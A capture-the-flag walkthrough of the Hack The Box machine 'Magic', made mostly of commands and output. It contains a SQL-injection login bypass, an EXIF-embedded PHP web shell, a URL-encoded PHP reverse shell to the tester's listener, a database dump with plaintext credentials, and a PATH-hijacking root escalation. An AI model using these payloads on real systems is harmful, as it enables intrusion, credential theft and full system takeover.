Enumeration:
root@docker-desktop:~/Documents/magic# scan 10.10.10.185
[*] OS based on TTL
38
Linux
[*] TCP Scan
Open ports: 80,22
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
TTL:0
Port scan:132
Nmap:8
Total:140
There is a web server listening, so let’s have a look at it:
It seems like it has an image carousel and a login page.
Intrusion:
To bypass the login page, a basic SQL injection was used:
Then got redirected to http://10.10.10.185/upload.php
, the objective right now is to get a reverse shell by uploading an image.
First tried to upload a PHP file by changing the Content-Type
header of the POST request, but the server seems to check the file's magic numbers together with a file whitelist.
So added a PHP payload to the comment metadata section of an already existing image:
root@osboxes:~/Downloads# exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' payload.png
1 image files updated
root@osboxes:~/Downloads# mv payload.png payload.php.png
Tested the RCE to make sure it was working:
Listened on port 1234 using ncat (wrapped in rlwrap): rlwrap nc -lvp 1234
Then used a URL-encoded reverse shell as the payload: http://10.10.10.185/images/uploads/payload.php.png?cmd=%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d%66%73%6f%63%6b%6f%70%65%6e%28%22%31%30%2e%31%30%2e%31%35%2e%32%34%35%22%2c%31%32%33%34%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27
After some manual enumeration, found MySQL credentials:
|
|
Then looked at which mysql-related binaries were available:
www-data@ubuntu:/var/www/Magic$ ls /usr/bin | grep mysql
mysql_config_editor
mysql_embedded
mysql_install_db
mysql_plugin
mysql_secure_installation
mysql_ssl_rsa_setup
mysql_tzinfo_to_sql
mysql_upgrade
mysqladmin
mysqlanalyze
mysqlbinlog
mysqlcheck
mysqld_multi
mysqld_safe
mysqldump
mysqldumpslow
mysqlimport
mysqloptimize
mysqlpump
mysqlrepair
mysqlreport
mysqlshow
mysqlslap
Used mysqldump
to dump all the databases:
www-data@ubuntu:/var/www/Magic$ mysqldump -u theseus -p --all-databases
Enter password: iamkingtheseus
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database:
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `Magic`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `Magic`;
--
-- Table structure for table `login`
--
DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
`id` int(6) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `login`
--
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2020-07-13 16:00:26
Then used that password to log in as “theseus”.
Privesc:
Looked for SUID files:
theseus@ubuntu:/var/www/Magic$ find / -type f -perm /4000 2>/dev/null | grep -v snap
snap / -type f -perm /4000 2>/dev/null | grep -v s
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/tmp/exploit2
/tmp/exploit.c
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping
Found that /bin/sysinfo is SUID, so it executes
as root; used strings to check what the binary does:
theseus@ubuntu:~$ strings /bin/sysinfo
...
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
...
Apparently it calls cat
by relative path, and since the SUID binary inherits the caller's PATH, we can perform a PATH hijacking attack:
We add /tmp
to the PATH, then we copy bash to that directory. Finally we create a file called cat
that changes the file's ownership to root and also gives it SUID permissions:
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ cp /bin/bash /tmp
theseus@ubuntu:/tmp$ echo "chown root /tmp/bash; chmod +s /tmp/bash" > cat
theseus@ubuntu:/tmp$ chmod +x cat
theseus@ubuntu:/tmp$ sysinfo > /dev/null 2>&1
theseus@ubuntu:/tmp$ ls -l /tmp/bash
-rwsr-sr-x 1 root theseus 1113504 Jul 14 03:46 /tmp/bash
theseus@ubuntu:/tmp$ ./bash -p
bash-4.4# id
uid=1000(theseus) gid=1000(theseus) euid=0(root) groups=1000(theseus),100(users)
Resources
- https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf
- https://book.hacktricks.xyz/pentesting-web/file-upload
- https://viblo.asia/p/leo-thang-dac-quyen-trong-linux-linux-privilege-escalation-2-using-path-variables-3P0lPq6o5ox
- https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/